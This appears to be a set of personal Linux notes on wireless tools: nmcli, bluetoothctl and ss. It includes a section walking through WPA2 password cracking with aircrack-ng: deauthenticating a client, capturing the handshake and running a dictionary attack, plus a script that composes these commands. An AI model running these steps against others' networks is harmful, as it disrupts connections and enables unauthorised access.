# Wireless networks

## nmcli

#### `iwconfig`/`iwlist` are deprecated: the replacements are `iw` (driver level) and `nmcli` (NetworkManager)

`nmcli dev` lists the network devices NetworkManager knows about, with their type, state and the active connection profile:

```bash
$ sudo nmcli dev

DEVICE    TYPE      STATE                   CONNECTION  
wlp2s0    wifi      connected               MylilNetwork     
lo        loopback  connected (externally)  lo          
enp1s0f0  ethernet  unavailable             --
```

`sudo nmcli device show wlp2s0` prints the device's properties: type, MAC address, MTU, state, the active connection profile, and further down the IPv4/IPv6 configuration (addresses, gateway, routes, DNS). Frequency, signal strength and bitrate of the AP you are on are shown by `nmcli dev wifi list`, not here.

```bash
vix@thinkpad:~$ sudo nmcli device show wlp2s0
GENERAL.DEVICE:                         wlp2s0
GENERAL.TYPE:                           wifi
GENERAL.HWADDR:                         AA:BB:CC:DD:EE:FF
GENERAL.MTU:                            1500
GENERAL.STATE:                          100 (connected)
GENERAL.CONNECTION:                     MylilNetwork
~~
```

`nmcli connection show` lists the saved **connection profiles**, and `nmcli connection show "<name>"` prints every property of one profile (for Wi-Fi that includes `802-11-wireless.ssid` and `802-11-wireless-security.key-mgmt`). Secrets such as the PSK are hidden unless you add `--show-secrets` as root; the profiles themselves live in `/etc/NetworkManager/system-connections/` and are readable only by root.

### Scan for wifi networks

`sudo nmcli dev wifi` (short for `nmcli dev wifi list`) lists the APs in range with channel, rate, signal and security in a readable table. NetworkManager may hand you cached results, so add `--rescan yes` when you want a fresh scan. The `*` in the `IN-USE` column marks the network you are currently connected to; `--` as SSID is a hidden network.

```bash
$ sudo nmcli dev wifi

IN-USE    SSID          MODE   CHAN  RATE        SIGNAL  BARS  SECURITY   
          MylilNetwork  Infra  1     195 Mbit/s  77      ▂▄▆_  WPA2       
*         G59           Infra  149   540 Mbit/s  62      ▂▄▆_  WPA2       
          --            Infra  7     270 Mbit/s  50      ▂▄__  WPA2       
          MrYu Home     Infra  157   540 Mbit/s  45      ▂▄__  WPA2       
          --            Infra  157   540 Mbit/s  45      ▂▄__  WPA2       
          ikea_Guest    Infra  10    270 Mbit/s  44      ▂▄__  WPA2       
          Pinky         Infra  8     270 Mbit/s  40      ▂▄__  WPA2       
          --            Infra  40    270 Mbit/s  32      ▂▄__  WPA2       
          --            Infra  36    540 Mbit/s  30      ▂___  WPA2 WPA3  
          Joe_5G        Infra  36    540 Mbit/s  30      ▂___  WPA2 WPA3  
```
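The same scan is easier to post-process in terse mode (`-t`), which prints one colon-separated line per AP and escapes colons inside values as `\:`. As an added example that is not part of these notes, the filter below classifies every AP and prints only the ones that are open, WEP, or still accept WPA1; the sample scan is constructed for the example and the SSIDs are made up:

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): triage a Wi-Fi scan for APs
# that are open, WEP, or still offer WPA1. Uses nmcli's terse output so the
# fields are machine-parseable; falls back to a constructed sample when
# nmcli is not installed (so the script also runs offline).
set -u

# Field order chosen so the SSID, which may itself contain ':', comes last.
FIELDS=CHAN,SIGNAL,SECURITY,SSID

# Constructed sample of `nmcli -t -f $FIELDS dev wifi list --rescan yes`.
# SSIDs are made up; the last line is a hidden network (empty SSID).
SAMPLE_SCAN='1:77:WPA2:MylilNetwork
149:62:WPA2:G59
7:50:WPA1 WPA2:LegacyAP
10:44::CafeFree
36:30:WPA2 WPA3:Joe_5G
6:25:WEP:Shop\:Guest
11:20:WPA2:
'

scan() {  # live scan when nmcli exists, otherwise the constructed sample
    if command -v nmcli >/dev/null 2>&1; then
        nmcli -t -f "$FIELDS" dev wifi list --rescan yes
    else
        printf '%s' "$SAMPLE_SCAN"
    fi
}

# One line per AP: <verdict> <signal>% ch<chan> [<security>] <ssid>
classify_aps() {
    awk -F: '
    NF >= 4 {
        chan = $1; sig = $2; sec = $3
        ssid = $0
        sub(/^[^:]*:[^:]*:[^:]*:/, "", ssid)   # everything after field 3
        gsub(/\\:/, ":", ssid)                 # undo nmcli escaping of ':'
        if (ssid == "") ssid = "<hidden>"
        if (sec == "")           v = "OPEN"    # no encryption at all
        else if (sec ~ /WEP/)    v = "WEP"     # RC4 with reused IVs, trivially cracked
        else if (sec ~ /WPA1/)   v = "WPA1"    # TKIP-era; downgrade target
        else if (sec ~ /WPA3/)   v = "WPA3"
        else                     v = "WPA2"
        printf "%-4s %3s%% ch%-3s [%s] %s\n", v, sig, chan, sec, ssid
    }'
}

# Keep only the verdicts worth acting on.
weak_aps() { classify_aps | awk '$1 == "OPEN" || $1 == "WEP" || $1 == "WPA1"'; }

scan | weak_aps
```

Putting the SSID last is deliberate: channel, signal and security never contain a colon, so only the remainder of the line needs unescaping. The verdict logic is the part to adapt; `nmcli -f ALL dev wifi list` additionally exposes `RSN-FLAGS`/`WPA-FLAGS` if you want to flag TKIP on otherwise-WPA2 networks.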

### Connect

`sudo nmcli dev wifi connect <SSID> password <password>` connects to an AP and saves a connection profile for it. Typed like this the password ends up in your shell history; `sudo nmcli --ask dev wifi connect <SSID>` prompts for it instead.

### Disconnect

`sudo nmcli device disconnect wlp2s0`, simple as that. This also stops NetworkManager from auto-reconnecting the device until you bring a connection up by hand.

### Device capabilities

`iw phy` (same output as `iw list`) shows what your Wi-Fi card can do in a lot of detail: bands and channels, HT/VHT/HE capabilities, supported cipher suites, and the supported interface modes. The last one is what to check before the aircrack-ng section below: if `monitor` is not listed, the card or driver cannot sniff. This is an `iw` command; nmcli has no equivalent.

## Bluetooth

Bluetooth distinguishes **pairing** from connecting: pairing is the one-time exchange that establishes a shared secret, connecting happens every session and uses it. While a device is in discoverable mode it advertises the items listed below:

* Name
* Class
* List of services
* Technical information

When two devices pair they derive a shared **link key**, which is stored on both sides and used to authenticate and encrypt later connections. Every Bluetooth device has a unique 48-bit address (BD_ADDR), laid out like an Ethernet MAC with the upper 24 bits identifying the manufacturer; the human-readable name is separate and is set by the manufacturer or the user.

### Connecting devices

On **Debian** (and any other distribution using BlueZ) the tool is `bluetoothctl`

```bash
$ bluetoothctl   # opens an interactive shell for the bluetooth daemon
[bluetooth]$
```

To scan devices we can simply type `scan on`

```bash
[bluetooth]$ scan on
```

After that, devices appear as they are discovered, each with its MAC address, for example: `[NEW] Device AA:BB:CC:11:22:33 Headphones`

And to pair it we just need to type `pair <MAC_addr>`

```bash
[bluetooth]$ pair AA:BB:CC:11:22:33
```

If you want it to reconnect automatically, and to be allowed to connect to you without a prompt, mark it trusted with `trust <MAC_addr>`

```bash
[bluetooth]$ trust AA:BB:CC:11:22:33
```

Then the last step, connecting, is `connect <MAC_addr>`

```bash
[bluetooth]$ connect AA:BB:CC:11:22:33
```

### Disconnecting and removing devices

Disconnecting is the intuitive `disconnect <MAC_addr>`

```bash
[bluetooth]$ disconnect AA:BB:CC:11:22:33
```

If you do not want to keep the device's info at all, use `remove <MAC_addr>`

This deletes everything stored about the device, including the link key and the trust flag, so it will not reconnect automatically and has to pair again to connect at all

```bash
[bluetooth]$ remove AA:BB:CC:11:22:33
```

### Finding/Checking devices

To find a device's MAC address use the `devices` command, still inside `bluetoothctl`.

So first, list the known devices with `devices`, then use `info <MAC_addr>` to see the details of the one you choose, including whether it is paired, trusted and connected and which services (UUIDs) it offers

```bash
[bluetooth]$ devices
Device AA:BB:CC:11:22:33 Headphones
Device 11:22:33:DD:EE:FF Anker SoundCore

[bluetooth]$ info AA:BB:CC:11:22:33
Device AA:BB:CC:11:22:33 (public)
        Name: My Bluetooth Headphones
        Alias: My Bluetooth Headphones
        Paired: yes
        Trusted: yes
        Blocked: no
        Connected: yes  
        LegacyPairing: no
        UUID: Audio Sink                (0000110b-0000-1000-8000-00805f9b34fb)
        UUID: A/V Remote Control Target (0000110c-0000-1000-8000-00805f9b34fb)
        UUID: Advanced Audio Distribu.. (0000110d-0000-1000-8000-00805f9b34fb)
```
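`bluetoothctl` also accepts its commands as arguments (`bluetoothctl devices`, `bluetoothctl info <MAC>`), so the session above can be scripted. As an added example that is not part of these notes, the script below walks every known device and reports the ones the adapter will reconnect to without asking, i.e. the trusted ones, flagging any that are trusted without being paired or that only support legacy (pre-2.1 PIN) pairing. The `info` output it parses is constructed to match the format shown above; the names and addresses are made up:

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): audit which Bluetooth
# devices are trusted, i.e. allowed to (re)connect without a prompt.
# Parses `bluetoothctl info` output; uses a constructed sample when no
# bluetoothctl is installed so it also runs offline.
set -u

# Constructed sample of `bluetoothctl info <MAC>` for three devices.
SAMPLE_INFO='Device AA:BB:CC:11:22:33 (public)
        Name: My Bluetooth Headphones
        Alias: My Bluetooth Headphones
        Paired: yes
        Trusted: yes
        Blocked: no
        Connected: yes
        LegacyPairing: no
        UUID: Audio Sink                (0000110b-0000-1000-8000-00805f9b34fb)
Device 11:22:33:DD:EE:FF (public)
        Name: Anker SoundCore
        Alias: Anker SoundCore
        Paired: no
        Trusted: yes
        Blocked: no
        Connected: no
        LegacyPairing: yes
Device 01:23:45:67:89:AB (random)
        Name: Unknown Tracker
        Alias: Unknown Tracker
        Paired: no
        Trusted: no
        Blocked: no
        Connected: no
        LegacyPairing: no
'

# Dump `info` for every device the adapter knows (live adapter only).
collect_info() {
    bluetoothctl devices | awk '$1 == "Device" { print $2 }' |
        while read -r mac; do bluetoothctl info "$mac"; done
}

# One line per trusted device: <MAC> <name> [NOT-PAIRED] [LEGACY-PAIRING]
bt_audit() {
    awk '
    function flush() {
        if (mac == "") return
        if (trusted == "yes") {
            note = ""
            if (paired != "yes") note = note " NOT-PAIRED"        # trusted yet no link key
            if (legacy == "yes") note = note " LEGACY-PAIRING"    # PIN-based, no SSP
            printf "%s %s%s\n", mac, name, note
        }
    }
    /^Device / { flush(); mac = $2; name = ""; paired = trusted = legacy = ""; next }
    /^[ \t]*Name: /          { sub(/^[ \t]*Name: /, ""); name = $0 }
    /^[ \t]*Paired: /        { paired = $2 }
    /^[ \t]*Trusted: /       { trusted = $2 }
    /^[ \t]*LegacyPairing: / { legacy = $2 }
    END { flush() }
    '
}

if command -v bluetoothctl >/dev/null 2>&1; then
    collect_info | bt_audit
else
    printf '%s' "$SAMPLE_INFO" | bt_audit
fi
```

Anything this prints that you do not recognise is a candidate for `bluetoothctl remove <MAC>`; a device that is trusted but not paired can reconnect with no authentication at all, and `LegacyPairing: yes` means the link key came from a PIN exchange rather than Secure Simple Pairing.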

## Wi-Fi cracking

### **aircrack-ng**

To crack Wi-Fi APs we will work with this suite, but first the network card has to be put into **monitor mode** with `airmon-ng start <interface>` (everything here needs root). Run `sudo airmon-ng check kill` beforehand: it stops NetworkManager and wpa_supplicant, which otherwise keep touching the interface and channel-hop underneath you. When you are done, `sudo airmon-ng stop <interface>mon` and `sudo systemctl start NetworkManager` put things back.

```bash
$ sudo airmon-ng start wlp2s0
~~some info~~
```

Monitor mode is now on, and airmon-ng renames the interface: **wlp2s0** becomes **wlp2s0mon** (`<interface_name>mon`). Check with `iw dev` if the airmon-ng output scrolled past

Now start sniffing. Without a channel argument `airodump-ng wlp2s0mon` hops across all channels and lists everything it hears

```bash
sudo airodump-ng wlp2s0mon
```

The columns you care about:

* **BSSID** MAC address of the AP (in the client table, the AP the client is associated with)
* **PWR** Signal level in dBm; closer to 0 is stronger
* **Beacons** Number of beacon frames seen from the AP
* **#Data** Number of captured data frames (not a rate); **#/s** is data frames per second over the last 10 seconds
* **CH** Channel the AP is operating on
* **ENC / CIPHER / AUTH** Encryption (OPN, WEP, WPA, WPA2, WPA3), cipher (WEP, TKIP, CCMP) and authentication (PSK or MGT for 802.1X)
* **ESSID** Name of the network

You will see something like this after running the command.

The top section lists the access points it can see; the bottom one, **Clients**, lists stations (laptops, phones) and which BSSID each is associated with. `(not associated)` entries are stations probing for networks they remember, which leaks the SSIDs in the Probe column

```bash
 CH  9 ][ Elapsed: 45 s ][ 2025-6-27 10:30

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 -------------------------------------------------------------------------------------------------
 1C:B0:4C:8F:A1:B2  -45      122       15    0   6  130  WPA2 CCMP   PSK  MyHomeWiFi
 00:1A:2B:3C:4D:5E  -68       98        0    0  11   54  WPA2 TKIP   PSK  CoffeeShop_Free
 DE:AD:BE:EF:12:34  -81       43        2    0   1  54.  WEP  WEP         SECRET_NETWORK
 
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe
 -------------------------------------------------------------------------------------------------
 1C:B0:4C:8F:A1:B2  A1:B2:C3:D4:E5:F6  -52    54-24      0       88
 (not associated)   AA:BB:CC:DD:EE:FF  -60     0- 1      0        4    MyHomeWiFi
```

### Wi-Fi password cracking

To crack a WPA/WPA2-PSK password you need three terminals.

In the first terminal, lock airodump-ng to the target's channel (`-c`) and BSSID (`--bssid`) and write the capture to disk with `-w <prefix>`; airodump-ng numbers its output files, so the capture lands in `<prefix>-01.cap` (with a `.csv` summary beside it).

Using MyHomeWiFi from the scan above, which is on channel 6:

```bash
sudo airodump-ng -c 6 --bssid 1C:B0:4C:8F:A1:B2 -w MyHomeWiFi wlp2s0mon
```

In the second terminal, use `aireplay-ng` to send deauthentication frames spoofed from the AP (`-a`) to a connected client (`-c`), which makes the client reconnect.

When it reconnects it redoes the WPA 4-way handshake, and that is what airodump-ng has to capture (it shows `WPA handshake: <BSSID>` in its top-right corner once it has one). You are not capturing a password hash: the handshake carries a MIC computed from a key derived from the passphrase, and cracking means guessing passphrases offline until one reproduces that MIC. The count after `--deauth` is the number of deauth bursts; a handful is usually enough, `0` means keep going, and leaving out `-c` broadcasts to every client of the AP

```bash
sudo aireplay-ng --deauth 10 -a 1C:B0:4C:8F:A1:B2 -c A1:B2:C3:D4:E5:F6 wlp2s0mon
```

In the last session we will start cracking :)

```bash
sudo aircrack-ng -w wordlist.txt -b 1C:B0:4C:8F:A1:B2 MyHomeWiFi-01.cap
```
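The parameters for terminals two and three (BSSID, channel, an associated client, the capture file name) all come out of the `<prefix>-01.csv` that airodump-ng writes next to the `.cap`. As an added example that is not part of these notes, the script below looks them up from that CSV for a given ESSID and prints the three commands to run. The CSV sample is constructed to mirror the airodump screen shown above, the MAC addresses are made up, and the layout follows the two tables airodump-ng writes (APs, a blank line, then stations):

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): pull the capture/deauth
# parameters for a target ESSID out of airodump-ng's CSV output and
# compose the three commands. It runs nothing itself.
set -u

# Constructed sample of MyHomeWiFi-01.csv; mirrors the screen above.
SAMPLE_CSV='BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
1C:B0:4C:8F:A1:B2, 2025-06-27 10:29:15, 2025-06-27 10:30:00,  6, 130, WPA2, CCMP, PSK, -45,      122,       15,   0.  0.  0.  0,  10, MyHomeWiFi, 
00:1A:2B:3C:4D:5E, 2025-06-27 10:29:16, 2025-06-27 10:30:00, 11,  54, WPA2, TKIP, PSK, -68,       98,        0,   0.  0.  0.  0,  15, CoffeeShop_Free, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
A1:B2:C3:D4:E5:F6, 2025-06-27 10:29:20, 2025-06-27 10:30:00, -52,       88, 1C:B0:4C:8F:A1:B2,
AA:BB:CC:DD:EE:FF, 2025-06-27 10:29:40, 2025-06-27 10:29:55, -60,        4, (not associated) ,MyHomeWiFi
'

# Print "<BSSID> <channel>" of the AP whose ESSID matches; CSV on stdin.
ap_lookup() {
    awk -v essid="$1" '
        BEGIN { FS = ","; sec = "ap" }
        /^Station MAC/ { sec = "sta"; next }        # second table starts here
        /^BSSID/ || NF < 2 { next }                  # header or blank separator
        { for (i = 1; i <= NF; i++) gsub(/^[ \t]+|[ \t]+$/, "", $i) }
        sec == "ap" && $14 == essid { print $1, $4 }
    '
}

# Print the station MACs associated with a BSSID; CSV on stdin.
# Stations that are only probing show "(not associated)" and are skipped.
ap_clients() {
    awk -v bssid="$1" '
        BEGIN { FS = ","; sec = "ap" }
        /^Station MAC/ { sec = "sta"; next }
        /^BSSID/ || NF < 2 { next }
        { for (i = 1; i <= NF; i++) gsub(/^[ \t]+|[ \t]+$/, "", $i) }
        sec == "sta" && $6 == bssid { print $1 }
    '
}

# plan_attack <csv> <essid> <monitor-iface> <capture-prefix>
plan_attack() {
    csv=$1; essid=$2; iface=$3; prefix=$4
    set -- $(ap_lookup "$essid" < "$csv")
    [ $# -eq 2 ] || { echo "ESSID '$essid' not found in $csv" >&2; return 1; }
    bssid=$1; chan=$2
    client=$(ap_clients "$bssid" < "$csv" | head -n 1)
    echo "# terminal 1: lock to the AP's channel, write ${prefix}-01.cap and .csv"
    echo "sudo airodump-ng -c $chan --bssid $bssid -w $prefix $iface"
    echo "# terminal 2: make one associated client redo the 4-way handshake"
    if [ -n "$client" ]; then
        echo "sudo aireplay-ng --deauth 5 -a $bssid -c $client $iface"
    else
        echo "# no associated client seen yet; wait, or broadcast: sudo aireplay-ng --deauth 5 -a $bssid $iface"
    fi
    echo "# terminal 3: offline dictionary attack on the captured handshake"
    echo "sudo aircrack-ng -w wordlist.txt -b $bssid ${prefix}-01.cap"
}

tmp=$(mktemp)
printf '%s' "$SAMPLE_CSV" > "$tmp"
plan_attack "$tmp" MyHomeWiFi wlp2s0mon MyHomeWiFi
rm -f "$tmp"
```

Against a real capture, point it at the CSV from the first terminal (`plan_attack MyHomeWiFi-01.csv MyHomeWiFi wlp2s0mon MyHomeWiFi`) after airodump-ng has run for a while; the client table fills in only once stations have been heard, and deauthing a client that was never seen achieves nothing.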

## ss

### Checking open ports locally

This is useful when you have labs hosted locally and forgot the port. `-t` and `-u` select TCP and UDP, `-l` shows only listening sockets, `-n` skips port-name and DNS lookups. Add `-p` (`sudo ss -tulnp`) to see which process owns each socket, and read the Local Address column: `0.0.0.0` or `[::]` means the service is reachable from the network, `127.0.0.1` or `[::1]` means only from this host

```bash
ss -tuln
```
